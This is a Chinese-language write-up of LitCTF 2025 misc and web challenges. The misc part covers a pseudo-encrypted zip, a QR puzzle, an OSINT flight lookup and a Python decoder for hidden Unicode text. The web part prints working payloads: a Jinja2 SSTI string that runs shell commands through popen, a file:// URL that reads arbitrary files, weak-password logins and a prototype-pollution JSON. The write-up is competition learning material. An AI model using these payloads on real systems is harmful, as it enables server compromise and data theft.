2025LitCTF

MISC

[LitCTF 2025]灵感菇🍄哩菇哩菇哩哇擦灵感菇灵感菇🍄

源代码中有github网址

image-20250527122720176

1
https://github.com/ProbiusOfficial/Lingicrypt

找到源码加解密的原理:

image-20250527123152268

image-20250527124114321

image-20250527124223446

[LitCTF 2025]Cropping

加密压缩包,查看十六进制,伪加密,将9改为0

image-20250527124848604

解压后拿到很多图片:

图片有编号,拼图二维码

image-20250527124938166

一把梭了

image-20250527125504303

image-20250527125558843

[LitCTF 2025]像素中的航班

小李要去参见长城杯了,他乘坐的哪趟航班?flag格式:LitCTF{航班号}

社工题:

中国南方航空

image-20250527125815597

4月28号参加长城杯,郑州—福州

测试后,CZ8289为正确航班号

image-20250527131138783

[LitCTF 2025]消失的文字

USB鼠标流量,CTFNet一把梭

拿到信息:

image-20250527131405143

拿到密码:868F-83BD-FF

解压后拿到文本,有很多不可见字符:

image-20250527131648659

查看十六进制数据,出现了很多F3 A0 84和F3 A0 85

image-20250527132157204

这里查看了Rxuxin师傅的博客,思路是:

  • 如果第三个字节是 0x85,则将第四个字节加上 0xd0(十进制 208)
  • 如果第三个字节是 0x84,则将第四个字节加上 0x90(十进制 144)
  • 结果对 256 取模
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
with open("1.txt",'rb') as f,open('2.txt','wb') as f_out:
data = f.read()
i = 0
while i < len(data) - 3: # 防止溢出
if data[i] == 0xf3 and data[i+1] == 0xa0:
char = data[i+2]
add_char = data[i+3]
add_value1 = 0xd0
add_value2 = 0x90

if char == 0x85:
result = (add_char+add_value1)%256
elif char == 0x84:
result = (add_char+add_value2)%256
else:
i += 1
continue

f_out.write(bytes([result]))

i += 4 #处理结束,跳过四个字节
else:
i += 1
1
LitCTF{39553317-df30-4951-8aad-fcaf3028ca9d}

Web

[LitCTF 2025]星愿信箱

1
SSTI漏洞,并且过滤了{{

image-20250527135807511

武器库一把梭了

1
{%for i in ''.__class__.__base__.__subclasses__()%}{%if i.__name__ =='_wrap_close'%}{%print i.__init__.__globals__['popen']('dir').read()%}{%endif%}{%endfor%}

image-20250527140216603

1
{"cmd":"aa{%for i in ''.__class__.__base__.__subclasses__()%}{%if i.__name__ =='_wrap_close'%}{%print i.__init__.__globals__['popen']('more /flag').read()%}{%endif%}{%endfor%}"}

image-20250527140341047

[LitCTF 2025]easy_file

扫描目录:

image-20250527141144651

登录页面存在弱口令:

1
2
admin
password

上传文件页面存在waf,且能上传图片

image-20250527141619208

查看页面源码,file查看图像:

image-20250527141731131

可以实现文件读取,利用文件包含图片马

image-20250527142324999

image-20250527142245013

[LitCTF 2025]easy_signin

页面403,扫描目录

image-20250528085437242

image-20250528085815125

找到登录页面,登录有严格校验,发现源码中有api接口:

image-20250528093017526

这里php协议被禁用,但file协议可以实现任意文件读取

1
http://node6.anna.nssctf.cn:20128/api/sys/urlcode.php?url=file:///var/www/html/api/sys/urlcode.php

image-20250528094041663

访问327a6c4304ad5938eaf0efb6cc3e53dc.php

1
http://node6.anna.nssctf.cn:20128/327a6c4304ad5938eaf0efb6cc3e53dc.php

拿到flag

image-20250528094405802

[LitCTF 2025]nest_js

弱口令登录admin/password拿到flag

image-20250528094456272

[LitCTF 2025]多重宇宙日记

exp:

1
2
3
4
5
6
7
{
"settings": {
"__proto__": {
"isAdmin": true
}
}
}